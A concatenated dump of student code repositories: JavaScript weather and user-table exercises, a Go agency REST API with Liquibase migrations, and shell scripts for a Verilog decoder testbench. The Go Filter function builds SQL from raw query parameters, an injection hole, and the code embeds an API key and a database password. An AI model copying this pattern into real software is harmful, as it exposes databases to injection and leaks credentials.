navItem.classList.remove("active");
}
item.classList.add("active");
},
showPage: function(page){
for(let pageElement of this.pages){
pageElement.style.display = "none";
}
page.style.display = "block";
},
checkAPIRestrictions: function(){
if(this.minutes !== new Date().getMinutes()) navService.counterMinute=0;
if(this.month !== new Date().getMonth()) navService.counterMonth=0;
console.log(this.counterMinute);
if(this.minutes === new Date().getMinutes() && navService.counterMinute>59) return false;
else if(this.month === new Date().getMonth() && navService.counterMonth>999999) return false;
else return true;
},
registerNavListeners: function(){
uiService.toggleLoader(true);
for(let i=0; i<this.navItems.length; i++){
this.navItems[i].addEventListener("click", function(){
navService.activateItem(this);
navService.showPage(navService.pages[i]);
})
}
this.searchBtn.addEventListener("click", function(event){
event.preventDefault();
uiService.toggleLoader(true);
weatherService.city = navService.navSearch.value;
weatherService.getDataAsync();
})
},
pagingHourly: function(data){
let currentPossition = 0;
let itemsShown = 10;
let numberOfListings = data.list.length;
if(currentPossition<= 0) navService.previousBtn.style.display = "none";
uiService.loadHourlyTable(data, currentPossition, itemsShown);
this.nextBtn.addEventListener('click', function(){
navService.previousBtn.style.display = "block";
currentPossition+=10;
itemsShown+=10;
uiService.loadHourlyTable(data, currentPossition, itemsShown);
if(numberOfListings<=itemsShown) navService.nextBtn.style.display = "none";
})
this.previousBtn.addEventListener('click', function(){
navService.nextBtn.style.display = "block";
currentPossition-=10;
itemsShown-=10;
uiService.loadHourlyTable(data, currentPossition, itemsShown);
if(currentPossition<= 0) navService.previousBtn.style.display = "none";
})
this.sortWindSpeed.addEventListener('click', function(){
let results = [];
for(let i=currentPossition; i<itemsShown; i++){
results.push(data.list[i]);
}
results.sort((a,b)=> a.wind.speed - b.wind.speed);
uiService.loadHourlyTableSorted(results);
})
}
};
let weatherService = {
apiKey: "9fadf053bb71e8c4a36d5943163d1642",
city: "skopje",
apiUrl: "https://api.openweathermap.org/data/2.5/",
getDataAsync: async function(){
if(navService.checkAPIRestrictions()){
try{
let data = await fetch(`${this.apiUrl}forecast?q=${this.city}&units=metric&appid=${this.apiKey}`);
let response = await data.json();
uiService.loadStatistics(await response);
navService.pagingHourly(await response);
uiService.statisticsCity.innerHTML = await response.city.name;
uiService.hdCity.innerHTML = await response.city.name;
navService.counterMinute++;
navService.counterMonth++;
uiService.toggleLoader(false);
this.getCircleDataAsync(await response.city.coord.lat, await response.city.coord.lon);
}
catch{
uiService.errorMessage('error');
uiService.toggleLoader(false);
}
}else{
uiService.errorMessage('restriction');
uiService.toggleLoader(false);
}
},
getCircleDataAsync: async function(lat, lon, cnt="5"){
let response = await fetch(`${weatherService.apiUrl}find?lat=${lat}&lon=${lon}&cnt=${cnt}&units=metric&appid=${weatherService.apiKey}`);
let data = await response.json();
uiService.citiesInCircle(await data);
uiService.itemsToShow.addEventListener('change', ()=>{
cnt = uiService.itemsToShow.value;
this.getCircleDataAsync(lat, lon, cnt);
})
},
agregateStatistics: function(data){
let list = data.list;
let highestTemperature = list[0];
let lowestTemperature = list[0];
let highestHumidity = list[0];
let lowestHumidity = list[0];
let temperatureSum = list.reduce((sum, reading)=> sum + reading.main.temp,0);
let humiditySum = list.reduce((sum, reading)=> sum + reading.main.humidity,0);
list.forEach(reading => {
if(highestTemperature.main.temp < reading.main.temp){
highestTemperature = reading;
}
if(lowestTemperature.main.temp > reading.main.temp){
lowestTemperature = reading;
}
if(highestHumidity.main.humidity < reading.main.humidity){
highestHumidity = reading;
}
if(lowestHumidity.main.humidity > reading.main.humidity){
lowestHumidity = reading;
}
});
return {
temperature:{
highest: highestTemperature.main.temp,
average: temperatureSum / list.length,
lowest: lowestTemperature.main.temp
},
humidity:{
highest: highestHumidity.main.humidity,
average: humiditySum / list.length,
lowest: lowestHumidity.main.humidity
},
warmestTime: helperService.unixTimeStampToDate(highestTemperature.dt),
coldestTime: helperService.unixTimeStampToDate(lowestTemperature.dt)
}
}
};
let uiService = {
statisticResult: document.getElementById("statisticsResult"),
tableResult: document.getElementById("tableResult"),
hdCity: document.getElementById("hdCity"),
statisticsCity: document.getElementById("statisticsCity"),
cityInCenter: document.getElementById("cityInCenter"),
citiesCircleResult: document.getElementById("citiesCircle"),
itemsToShow: document.getElementById("itemsToShow"),
loader: document.getElementById("loader"),
loadStatistics: function(data){
let statisticsData = weatherService.agregateStatistics(data);
this.statisticResult.innerHTML= `
<div class="mb-5">
<div class="row">
<div class="col-md-6">MAX TEMP: ${Math.round(statisticsData.temperature.highest)}C</div>
<div class="col-md-6">MAX HUMD: ${Math.round(statisticsData.humidity.highest)}%</div>
</div>
<div class="row">
<div class="col-md-6">AVG TEMP: ${statisticsData.temperature.average.toFixed(1)}C</div>
<div class="col-md-6">AVG HUMD: ${statisticsData.humidity.lowest.toFixed(2)}%</div>
</div>
<div class="row">
<div class="col-md-6">LOW TEMP: ${statisticsData.temperature.lowest}C</div>
<div class="col-md-6">LOW HUMD: ${statisticsData.humidity.lowest}%</div>
</div>
</div>
<h4>Warmest time of the following period: ${statisticsData.warmestTime.toDateString()}</h4>
<h4>Coldest time of the following period: ${statisticsData.coldestTime.toDateString()}</h4>
`;
},
loadHourlyTable: function(data, currentPossition, itemsShown){
uiService.tableResult.innerHTML = "";
for(let i=currentPossition; i<itemsShown; i++){
uiService.tableResult.innerHTML +=`
<div class="row">
<div class="col-md-2">
<img src="http://openweathermap.org/img/w/${data.list[i].weather[0].icon}.png" alt="weather-icon" >
</div>
<div class="col-md-2">${data.list[i].weather[0].description}</div>
<div class="col-md-2">${helperService.unixTimeStampToDate(data.list[i].dt).toDateString()}</div>
<div class="col-md-2">${data.list[i].main.temp}C (${data.list[i].main.feels_like}C)</div>
<div class="col-md-2">${data.list[i].main.humidity}</div>
<div class="col-md-2">${data.list[i].wind.speed}</div>
</div>
`
}
},
loadHourlyTableSorted: function(data){
this.tableResult.innerHTML = "";
data.forEach(reading => {
this.tableResult.innerHTML +=`
<div class="row">
<div class="col-md-2">
<img src="http://openweathermap.org/img/w/${reading.weather[0].icon}.png" alt="weather-icon" >
</div>
<div class="col-md-2">${reading.weather[0].description}</div>
<div class="col-md-2">${helperService.unixTimeStampToDate(reading.dt).toDateString()}</div>
<div class="col-md-2">${reading.main.temp}C (${reading.main.feels_like}C)</div>
<div class="col-md-2">${reading.main.humidity}</div>
<div class="col-md-2">${reading.wind.speed}</div>
</div>
`
});
},
citiesInCircle: function(data){
this.cityInCenter.innerHTML = data.list[0].name;
this.citiesCircleResult.innerHTML = "";
data.list.forEach((city, index)=> {
this.citiesCircleResult.innerHTML+=`
<div class="row">
<div class="col-md-2">${index+1}</div>
<div class="col-md-2">${city.name}</div>
<div class="col-md-2">${city.main.temp}</div>
<div class="col-md-2">${city.main.feels_like}</div>
<div class="col-md-2">${city.main.humidity}</div>
<div class="col-md-2">${city.main.pressure}</div>
</div>
`
});
},
toggleLoader: function(flag){
if(flag) this.loader.style.display = "block";
else this.loader.style.display = "none";
},
errorMessage: function(type){
if(type === 'restriction'){
$("#pages").after(`
<div class="error" style="background-color: white;">
<img src="./src/image/lock.png" alt="error" height="150px">
<h1>We apologize for your inconvenience! Please come back and try again.</h1>
<h3>There is a reachability limit by minute and month, and seems like you've reached it!</h3>
<p>**The limit per minute is 60 searches!**</p>
</p>**The limit per month is 1M searches!**</p>
</div>
`);
}else{
$("#pages").after(`
<div class="error">
<img src="./src/image/error.png" alt="error" height="150px">
<h1>Something went wrong!</h1>
<h3>Refresh the page and try again!</h3>
</div>`);
}
}
};
let helperService = {
unixTimeStampToDate: function(unixTimeStamp){
return new Date(unixTimeStamp * 1000);
}
};
navService.registerNavListeners();
weatherService.getDataAsync();<file_sep>let display = $("#display");
let searchInput = $("#searchInput");
let searchBtn = $("#searchBtn");
function makeCall(url, callback){
$.ajax({
url: url,
success: function(response){
callback(response, searchInput.val().toLowerCase());
},
error: function(){
console.log('Something went wrong! Reload and try again!');
}
});
}
function printResults(results){
display.html("");
display.append(`
<tr>
<th>Name</th>
<th>Email</th>
<th>Phone</th>
</tr>`);
results.forEach(user => {
display.append(`
<tr>
<td>${user.name}</td>
<td>${user.email}</td>
<td>${user.phone}</td>
</tr>`);
});
display.append(`<div> Total ID sum: ${calculateIDSum(results)}</div>`);
}
function printSearchResults(results, search){
let result= [];
results.forEach(user=>{
if(user.name.toLowerCase() === search || user.email.toLowerCase() === search || user.phone.toLowerCase() === search){
result.push(user);
}
})
if(result.length === 0){
display.html("No results found!");
}else{
printResults(result);
}
}
function calculateIDSum(results){
let IDSum = results
.map(user=>user.id)
.reduce((sum, id) => sum+=id, 0);
return IDSum;
}
searchBtn.click(()=>{
makeCall("https://jsonplaceholder.typicode.com/users", printSearchResults);
})
makeCall("https://jsonplaceholder.typicode.com/users", printResults);<file_sep>function Person(firstName, lastName, age){
this.firstName = firstName;
this.lastName = lastName;
this.age = age;
this.getFullName = function(){
console.log(`${firstName} ${lastName}`);
}
}
function Student(firstName, lastName, age, academyName, studentId){
Object.setPrototypeOf(this, new Person(firstName, lastName, age));
this.academyName = academyName;
this.studentId = studentId;
this.study = function(){
console.log(`The student ${this.firstName} is studing in the ${this.academyName}`);
}
}
/* let student1 = new Student('John', 'Johnsky', 20, 'SEDC', 1);
let student2 = new Student('Greg', 'Gregsky', 25, 'someAcademy', 2 ); */
/* Student.prototype.getAcademyName = function(student){
console.log(student.academyName);
} */
/* Student.getAcademyName = function(){
console.log(`The student ${this.firstName} is in ${this.academyName} academy`);
}; */
//Is this correct?
/* Student.getAcademyName = function(student){
console.log(`The student ${student.firstName} is in ${student.academyName} academy.`);
} */
Person.prototype.checkForAcademy = function (student){
console.log(student.academyName);
}
function DesignStudent(firstName, lastName, age, studentId, isStudentOfTheMonth){
Object.setPrototypeOf(this, new Student(firstName, lastName, age,"Academy for Design", studentId));
this.isStudentOfTheMonth = isStudentOfTheMonth;
this.attendAdobeExam = function(){
console.log(`The student ${this.firstName} is doing an adobe exam!`);
}
}
function CodeStudent(firstName,lastName, age, studentId, hasIndividualProject, hasGroupProject){
Object.setPrototypeOf(this, new Student(firstName, lastName, age, "Academy for Web Development", studentId));
this.hasIndividualProject = hasIndividualProject;
this.hasGroupProject = hasGroupProject;
this.doProject = function(type){
if(type.toLowerCase() === 'individual'){
this.hasIndividualProject = true;
console.log(`The student ${this.firstName} ${this.lastName} is working on the ${type} project!`);
}else if(type.toLowerCase() === 'group'){
this.hasGroupProject = true;
console.log(`The student ${this.firstName} ${this.lastName} is working on the ${type} project!`);
}else console.log('Invalid type od project!');
}
}
function NetworkStudent(firstName, lastName, age, studentId, academyPart){
Object.setPrototypeOf(this, new Student(firstName, lastName, age, "Academy for Communication Networks and Security", studentId));
this.academyPart = academyPart;
this.attendCiscoExam = function(){
console.log(`The student ${this.firstName} is doing a Cisco exam!`);
}
}
let john = new DesignStudent('John', 'Johnsky', 23, 5, false);
let bob = new CodeStudent('Bob', 'Bobsky', 25, 23, true, false);
let greg = new NetworkStudent('Greg', 'Gregsky', 33, 34, 2);
/* Student.getAcademyName(john);
Student.getAcademyName(bob);
Student.getAcademyName(greg); */
john.checkForAcademy(john);
bob.checkForAcademy(bob);
greg.checkForAcademy(greg);
<file_sep>class Animal{
constructor(name, age, type, size){
this.name = name;
this.age = age;
this.type = type;
this.size = size;
this.isEaten = false;
}
eat(animal){
if(animal instanceof Animal){
if(this.type.toLowerCase() === 'herbivore') console.log(`The animal ${this.name} is a herbivore and does not eat other animals`);
else{
if(this.size*2 <= animal.size) console.log(`The animal ${this.name} tried to eat ${animal.name} but it was too large.`);
else{
animal.isEaten = true;
console.log(`The animal ${this.name} ate the animal ${animal.name}`);
}
}
}else console.log(`The animal ${this.name} is eating ${animal}...`);
}
static getType(animal){
if(animal instanceof Animal) console.log(`The animal ${animal.name} is a ${animal.type} type of animal!`);
else console.log(`Unknown type of animal!`);
}
}
class Carnivore extends Animal{
constructor(name, age, size){
super(name, age, 'carnivore', size);
}
}
class Herbivore extends Animal{
constructor(name, age, size){
super(name, age, 'herbivore', size);
}
}
class Omnivore extends Animal{
constructor(name, age, size){
super(name, age, 'omnivore', size);
}
}
let lion = new Carnivore('Simba', 5, 500);
let zebra = new Herbivore('Marty', 10, 200);
let bear = new Omnivore('Beary', 1, 200);
let food = 'Carrots';
lion.eat(zebra);
zebra.eat(lion);
zebra.eat(food);
bear.eat(lion);
bear.eat(zebra);
bear.eat(food);
Animal.getType(lion);
Animal.getType(zebra);
Animal.getType(food);
<file_sep>//JQUERY
let btn = $("#btn");
let display = $("#display");
let clearBtn = $("#clearBtn");
btn.click(function(){
$.ajax ({
url: "https://jsonplaceholder.typicode.com/users",
success: function(data){
printDataResults(display, data);
},
error: function(){
alert('Error');
}
})
})
clearBtn.click(function(){
display.html("");
})
function printDataResults(display, data){
display.html(
`
<tr>
<th>ID</th>
<th>Name</th>
<th>Username</th>
<th>Email</th>
<th>Phone</th>
<th>Website</th>
<th>Address</th>
<th>Company</th>
</tr>`);
for(let user of data){
display.append(`
<tr>
<td>${user.id}</td>
<td>${user.name}</td>
<td>${user.username}</td>
<td>${user.email}</td>
<td>${user.phone}</td>
<td>${user.website}</td>
<td><b>Street:</b> ${user.address.street}<br>
<b>Suite:</b> ${user.address.suite}<br>
<b>City:</b> ${user.address.city}<br>
<b>Zipcode:</b> ${user.address.zipcode}<br>
<b>Geo:</b> lat-${user.address.geo.lat}, lng-${user.address.geo.lng}</td>
<td><b>Name:</b> ${user.company.name}<br>
<b>Catch Phrase: ${user.company.catchPhrase}<br>
<b>BS:</b> ${user.company.bs}</td>
</tr>
`);
}
}
//FETCH
/*let btn = document.getElementById("btn");
let display = document.getElementById("display");
let clearBtn = document.getElementById("clearBtn");
btn.addEventListener('click', function(){
fetch("https://jsonplaceholder.typicode.com/users")
.then(function(data){
return data.json();
})
.then(function(data){
printDataResults(display,data)
})
})
clearBtn.addEventListener('click', function(){
display.innerHTML = "";
})
function printDataResults(display, data){
display.innerHTML =
`
<tr>
<th>ID</th>
<th>Name</th>
<th>Username</th>
<th>Email</th>
<th>Phone</th>
<th>Website</th>
<th>Address</th>
<th>Company</th>
</tr>
`;
for(let user of data){
display.innerHTML+=
`<tr>
<td style="border: 1px solid black;">${user.id}</td>
<td>${user.name}</td>
<td>${user.username}</td>
<td>${user.email}</td>
<td>${user.phone}</td>
<td>${user.website}</td>
<td><b>Street:</b> ${user.address.street}<br>
<b>Suite:</b> ${user.address.suite}<br>
<b>City:</b> ${user.address.city}<br>
<b>Zipcode:</b> ${user.address.zipcode}<br>
<b>Geo:</b> lat-${user.address.geo.lat}, lng-${user.address.geo.lng}</td>
<td><b>Name:</b> ${user.company.name}<br>
<b>Catch Phrase: ${user.company.catchPhrase}<br>
<b>BS:</b> ${user.company.bs}</td>
</tr>
`
}
}*/<file_sep>function Academy(name, students, subjects, start, end){
this.name = name;
this.students = students;
this.subjects = subjects;
this.start = start;
this.end = end;
this.numberOfClasses = this.subjects.length *10;
this.printStudents = function(){
this.students.forEach(student => {
console.log(`${student.firstName} ${student.lastName}`);
});
}
this.printSubjects = function(){
this.subjects.forEach(subject => {
console.log(subject.title);
});
}
}
function Subject(title, isElective, academy, students){
this.title = title;
this.numberOfClasses = 10;
this.isElective = isElective;
this.academy = academy;
this.students = students;
this.overrideClasses = function(number){
if(number<3) return;
else this.numberOfClasses = number;
}
}
function Student(firstName, lastName, age){
this.firstName = firstName;
this.lastName = lastName;
this.age = age;
this.completedSubjects = [];
this.academy = null;
this.currentSubject = null;
this.startAcademy = function(academyObject){
this.academy = academyObject;
academyObject.students.push({firstName,lastName,age});
}
this.startSubject = function(subject){
if(this.academy === null) return;
else{
this.academy.subjects.forEach(sub => {
if(sub.title.toLowerCase() === subject.title.toLowerCase()){
if(this.currentSubject !== null) this.completedSubjects.push(this.currentSubject);
this.currentSubject = subject;
subject.students.push({firstName,lastName,age});
}
});
if(this.currentSubject === null) console.log('This is not a valid subject!');
}
}
}
|
7787b35c778fdd1c0b01ae3d12dde26ab139f1cc
|
[
"JavaScript"
] | 8
|
JavaScript
|
Dejan-Stojkoski/Homeworks-JSAdvanced
|
1470b8c7628961481e76cf2653d21294861d4fbb
|
6fad8f875d03b7a9352d5e6f120ef662521ece49
|
refs/heads/master
|
<file_sep>package repository
import (
"github.com/go-foward/abroad/domain/agency/dbmodels"
)
// AgencyCreator interface
type AgencyCreator interface {
Create(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error)
}
// AgencyEditor interface
type AgencyEditor interface {
Save(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error)
}
// AgencyRetriever interface
type AgencyRetriever interface {
Get(id int) (*dbmodels.AgencyDatabaseModel, error)
}
// AgencyFilterer interface
type AgencyFilterer interface {
Filter(filter map[string][]string) ([]dbmodels.AgencyDatabaseModel, error)
}
// AgencyRepository agency interfaces composition
type AgencyRepository interface {
AgencyCreator
AgencyEditor
AgencyRetriever
AgencyFilterer
}
<file_sep>package repository
import (
"fmt"
"log"
"strings"
"github.com/go-foward/abroad/domain/agency/dbmodels"
"github.com/jmoiron/sqlx"
)
// AgencyDatabaseRepository ...
type AgencyDatabaseRepository struct {
Database *sqlx.DB
}
// NewAgencyDatabaseRepository ...
func NewAgencyDatabaseRepository(db *sqlx.DB) *AgencyDatabaseRepository {
return &AgencyDatabaseRepository{
Database: db,
}
}
// Get ...
func (repo AgencyDatabaseRepository) Get(id int) (*dbmodels.AgencyDatabaseModel, error) {
var agency dbmodels.AgencyDatabaseModel
err := repo.Database.Get(&agency, "SELECT * FROM agency WHERE id = $1", id)
return &agency, err
}
// Filter ...
func (repo AgencyDatabaseRepository) Filter(filters map[string][]string) ([]dbmodels.AgencyDatabaseModel, error) {
var agencies []dbmodels.AgencyDatabaseModel
where := "WHERE 1=1"
for key, value := range filters {
where = fmt.Sprintf("%s AND %s = %s", where, key, fmt.Sprintf("'%s'", strings.Join(value, "','")))
}
log.Println(fmt.Sprintf("SELECT * FROM agency %s", where))
err := repo.Database.Select(&agencies, fmt.Sprintf("SELECT * FROM agency %s", where))
log.Println(agencies)
return agencies, err
}
// Save ...
func (repo AgencyDatabaseRepository) Save(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error) {
return nil, nil
}
// Create ...
func (repo AgencyDatabaseRepository) Create(agency dbmodels.AgencyDatabaseModel) (*dbmodels.AgencyDatabaseModel, error) {
preparedStatement, err := repo.Database.PrepareNamed("INSERT INTO agency(name) VALUES(:name) RETURNING id")
if err != nil {
return nil, err
}
var id int
err = preparedStatement.Get(&id, agency)
if err != nil {
return nil, err
}
createdAgency, err := repo.Get(id)
if err != nil {
return nil, err
}
return createdAgency, err
}
<file_sep>package dbmodels
// AgencyDatabaseModel model
type AgencyDatabaseModel struct {
ID int `db:"id"`
Name string `db:"name"`
}
// AgencyDatabaseModelOption type
type AgencyDatabaseModelOption func(*AgencyDatabaseModel)
// NewAgencyDatabaseModel AgencyDatabaseModel builder
func NewAgencyDatabaseModel(name string, options ...AgencyDatabaseModelOption) *AgencyDatabaseModel {
model := &AgencyDatabaseModel{
Name: name,
}
for _, option := range options {
option(model)
}
return model
}
// AgencyID adds id into model
func AgencyID(id int) AgencyDatabaseModelOption {
return func(model *AgencyDatabaseModel) {
model.ID = id
}
}
<file_sep>package entities
// Agency model
type Agency struct {
ID int
Name string
}
<file_sep>package api
func (api API) routes() {
api.GET("/agency", filterAgency(api.AgencyRepository))
api.GET("/agency/:id", getAgency(api.AgencyRepository))
api.POST("/agency", postAgency(api.AgencyRepository))
}
<file_sep>--liquibase formatted sql
--changeset lucas.santos:1
CREATE TABLE IF NOT EXISTS agency (
id serial PRIMARY KEY,
name VARCHAR(255)
);
--rollback DROP TABLE IF EXISTS agency;<file_sep>package usecases
import (
"github.com/go-foward/abroad/domain/agency/repository"
)
// AgencyFilterRequest ...
type AgencyFilterRequest struct {
Filters map[string][]string
}
// AgencyFiltered ...
type AgencyFiltered struct {
ID int `json:"id"`
Name string `json:"name"`
}
// AgencyFilterResponse ...
type AgencyFilterResponse struct {
Agencies []AgencyFiltered `json:"agencies"`
}
// AgencyFilterUseCase ...
type AgencyFilterUseCase struct {
agencyRepository repository.AgencyRepository
}
// NewAgencyFilterUseCase ...
func NewAgencyFilterUseCase(repo repository.AgencyRepository) *AgencyFilterUseCase {
return &AgencyFilterUseCase{
agencyRepository: repo,
}
}
// Execute ...
func (usecase AgencyFilterUseCase) Execute(request AgencyFilterRequest) (*AgencyFilterResponse, error) {
dbAgencies, err := usecase.agencyRepository.Filter(request.Filters)
if err != nil {
return nil, err
}
agencies := []AgencyFiltered{}
for _, value := range dbAgencies {
agencies = append(agencies, AgencyFiltered{
ID: value.ID,
Name: value.Name,
})
}
response := &AgencyFilterResponse{
Agencies: agencies,
}
return response, nil
}
<file_sep>package api
import (
"fmt"
"io/ioutil"
"log"
"github.com/go-foward/abroad/domain/agency/repository"
"github.com/labstack/echo"
)
// API entrypoint
type API struct {
*echo.Echo
AgencyRepository repository.AgencyRepository
}
// NewAPI creates a new application
func NewAPI(repo repository.AgencyRepository) *API {
return &API{
Echo: echo.New(),
AgencyRepository: repo,
}
}
func (api API) printBanner() {
api.Echo.HideBanner = true
bytes, err := ioutil.ReadFile("banner.txt")
if err != nil {
log.Fatal(err)
}
fmt.Println(string(bytes))
}
// Run start http server
func (api API) Run() {
api.middlewares()
api.routes()
api.printBanner()
log.Fatal(api.Start(":8080"))
}
<file_sep>package compare
// StringsContains checks if a list of string contains a particular string
func StringsContains(values []string, query string) bool {
for _, value := range values {
if value == query {
return true
}
}
return false
}
<file_sep>package usecases
import (
"github.com/go-foward/abroad/domain/agency/repository"
)
// AgencyGetByIDRequest ...
type AgencyGetByIDRequest struct {
ID int
}
// AgencyRetrieved ...
type AgencyRetrieved struct {
Name string `json:"name"`
}
// AgencyGetResponse ...
type AgencyGetResponse struct {
Agency AgencyRetrieved `json:"agency"`
}
// AgencyGetByIDUseCase ...
type AgencyGetByIDUseCase struct {
agencyRepository repository.AgencyRepository
}
// NewAgencyGetByIDUseCase ...
func NewAgencyGetByIDUseCase(repo repository.AgencyRepository) *AgencyGetByIDUseCase {
return &AgencyGetByIDUseCase{
agencyRepository: repo,
}
}
// Execute ...
func (usecase AgencyGetByIDUseCase) Execute(request AgencyGetByIDRequest) (*AgencyGetResponse, error) {
var response *AgencyGetResponse
agency, err := usecase.agencyRepository.Get(request.ID)
if err != nil {
return nil, err
}
response = &AgencyGetResponse{
Agency: AgencyRetrieved{Name: agency.Name},
}
return response, nil
}
<file_sep>
DIR := ${CURDIR}
LIQUIBASE_CONFIGS := --defaultsFile=/infra/liquibase/liquibase.properties
RUN_LIQUIBASE := docker build -t liquibase ./liquibase && docker run --network host liquibase
_migrate:
${RUN_LIQUIBASE} update
tag:
${RUN_LIQUIBASE} tag "$(shell date '+%Y-%m-%d %H:%M:%S')"
migrate: _migrate tag
# example: make rollback tag="2000-01-01 18:56:57.668819"
rollback:
${RUN_LIQUIBASE} rollback $(tag)
dangerouslyRollback:
${RUN_LIQUIBASE} rollback rollbackToDate 2000-01-01 18:56:57.668819<file_sep>FROM openjdk:11-jre-slim-buster
RUN apt-get update \
&& apt-get -y install gnupg wget \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
RUN mkdir /opt/liquibase
WORKDIR /opt/liquibase
COPY . /opt/liquibase
ARG LIQUIBASE_VERSION=4.0.0
RUN set -x \
&& wget -O liquibase-${LIQUIBASE_VERSION}.tar.gz "https://github.com/liquibase/liquibase/releases/download/v${LIQUIBASE_VERSION}/liquibase-${LIQUIBASE_VERSION}.tar.gz" \
&& tar -xzf liquibase-${LIQUIBASE_VERSION}.tar.gz
RUN ln -s /opt/liquibase/liquibase /usr/local/bin/
RUN ls -la
ENTRYPOINT ["liquibase"]<file_sep>package usecases
import (
"github.com/go-foward/abroad/domain/agency/dbmodels"
"github.com/go-foward/abroad/domain/agency/repository"
)
// AgencyCreateRequest ...
type AgencyCreateRequest struct {
Name string
}
// AgencyCreated ...
type AgencyCreated struct {
ID int `json:"id"`
Name string `json:"name"`
}
// AgencyCreateResponse ...
type AgencyCreateResponse struct {
Agency AgencyCreated `json:"agency"`
}
// AgencyCreateUseCase ...
type AgencyCreateUseCase struct {
agencyRepository repository.AgencyRepository
}
// NewAgencyCreateUseCase ...
func NewAgencyCreateUseCase(repo repository.AgencyRepository) *AgencyCreateUseCase {
return &AgencyCreateUseCase{
agencyRepository: repo,
}
}
// Execute ...
func (usecase AgencyCreateUseCase) Execute(request AgencyCreateRequest) (*AgencyCreateResponse, error) {
dbAgency := dbmodels.NewAgencyDatabaseModel(request.Name)
agency, err := usecase.agencyRepository.Create(*dbAgency)
if err != nil {
return nil, err
}
response := &AgencyCreateResponse{
Agency: AgencyCreated{
ID: agency.ID,
Name: agency.Name,
},
}
return response, nil
}
<file_sep>module github.com/go-foward/abroad
go 1.14
require (
github.com/jackc/pgx/v4 v4.8.1
github.com/jmoiron/sqlx v1.2.0
github.com/labstack/echo v3.3.10+incompatible
github.com/labstack/echo/v4 v4.1.16 // indirect
gopkg.in/natefinch/lumberjack.v2 v2.0.0
)
<file_sep>package main
import (
"log"
"github.com/go-foward/abroad/application/agency/repository"
"github.com/go-foward/abroad/application/api"
_ "github.com/jackc/pgx/v4/stdlib"
"github.com/jmoiron/sqlx"
)
func main() {
db, err := sqlx.Connect("pgx", "postgres://postgres:adm123@localhost:5432/abroad?sslmode=disable")
if err != nil {
log.Fatalln(err)
}
agencyRepository := repository.NewAgencyDatabaseRepository(db)
v1 := api.NewAPI(agencyRepository)
v1.Run()
}
<file_sep>package api
import (
"time"
"github.com/labstack/echo"
"github.com/labstack/echo/middleware"
"gopkg.in/natefinch/lumberjack.v2"
)
func (api API) middlewares() {
api.Use(middleware.LoggerWithConfig(middleware.LoggerConfig{
Output: &lumberjack.Logger{
Filename: "./output.log",
MaxSize: 10,
MaxBackups: 3,
MaxAge: 28,
Compress: false,
},
}))
api.Use(middleware.Recover())
api.Use(api.traceRequest)
}
func (api API) traceRequest(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
c.Set("requestID", time.Now().String())
return next(c)
}
}
<file_sep>package api
import (
"log"
"net/http"
"strconv"
"github.com/go-foward/abroad/domain/agency/repository"
"github.com/go-foward/abroad/domain/agency/usecases"
"github.com/labstack/echo"
)
func filterAgency(repo repository.AgencyRepository) echo.HandlerFunc {
return func(c echo.Context) error {
request := usecases.AgencyFilterRequest{
Filters: c.Request().URL.Query(),
}
log.Println(request)
response, err := usecases.NewAgencyFilterUseCase(repo).Execute(request)
if err != nil {
return err
}
return c.JSON(http.StatusOK, response.Agencies)
}
}
func getAgency(repo repository.AgencyRepository) echo.HandlerFunc {
return func(c echo.Context) error {
id, _ := strconv.Atoi(c.Param("id"))
request := usecases.AgencyGetByIDRequest{ID: id}
agency, err := usecases.NewAgencyGetByIDUseCase(repo).Execute(request)
if err != nil {
return err
}
return c.JSON(http.StatusOK, agency)
}
}
func postAgency(repo repository.AgencyRepository) echo.HandlerFunc {
return func(c echo.Context) error {
var createAgencyRequest usecases.AgencyCreateRequest
err := c.Bind(&createAgencyRequest)
if err != nil {
return err
}
usecase := usecases.NewAgencyCreateUseCase(repo)
createdAgency, err := usecase.Execute(createAgencyRequest)
if err != nil {
return err
}
return c.JSON(http.StatusCreated, createdAgency)
}
}
|
ca4ad54586feb7f70528d2068325605e8f7971b3
|
[
"SQL",
"Makefile",
"Go",
"Go Module",
"Dockerfile"
] | 17
|
Go
|
lucas-rds/golang-abroad
|
0a58d1e7a3bc477f768ba4568e2243c76620632a
|
29b22ef1e65088f1447ffb4ce5365ec04cf4509a
|
refs/heads/master
|
<file_sep># Design-Patterns
Code from the course by <NAME>
<file_sep>// Pimple Idiom
// hiding the implementation of a particular class by sticking it to its
// implementation.
// By this we are hiding the details of the implementation.
// The details go to the cpp files and are not provided to the client of the code.
#include "Person.h"
struct Person::PersonImpl
{
void greet(Person* p);
};
void Person::PersonImpl::greet(Person* p)
{
printf("hello %s", p->name.c_str());
}
Person::Person()
: impl(new PersonImpl)
{
}
Person::~Person()
{
delete impl;
}
void Person::greet()
{
impl->greet(this);
}
<file_sep>#pragma once
#include <string>
struct Person
{
std::string name;
struct PersonImpl;
PersonImpl *impl; // bridge - not necessarily inner class, can vary
Person();
~Person();
// Implementation would be bridged in a separate class.
void greet();
};
<file_sep>#include <iostream>
#include "person.h"
#include "PersonBuilder.h"
#include "PersonAddressBuilder.h"
#include "PersonJobBuilder.h"
int main
{
Person p = Person::create()
.lives().at("").with_postcode("").in("")
.works().at("").as_a("").earning(141);
return 0;
}
|
a5310d40c3afd619edb5ac33416c3bd7239afa3b
|
[
"Markdown",
"C++"
] | 4
|
Markdown
|
ArshaShiri/Design-Patterns
|
6cdfa2ab2b6a20f07cc229ad0d9c1824997b4814
|
34b3dcac41dcc36c188d40924a463264f0bcaf71
|
refs/heads/master
|
<file_sep>#!/bin/bash
awk -vORS="" -F"[][ ]" '{print $1}' a_out.txt >> testvector.txt
awk -vORS="" -F"[][ ]" '{print $1}' b_out.txt >> testvector.txt
awk -vORS="" -F"[][ ]" '{print $1}' c_out.txt >> testvector.txt
irun \
-clean \
-access rwc \
+define+TEST=20 \
-input run.tcl \
tb.sv \
decoder.v
<file_sep># PTM-Packet-Decoder
Seoul National University Intern Project
<file_sep>#!/bin/bash
scp -P 2222 ~/바탕화면/인턴/fyp/tb.sv sglee@SNU:~/test_code/
scp -P 2222 ~/바탕화면/인턴/fyp/decoder.v sglee@SNU:~/test_code/
scp -P 2222 ~/바탕화면/인턴/fyp/test.sh sglee@SNU:~/test_code/runsim
ssh -p 2222 sglee@SNU "cd test_code; bash -ic runsim"
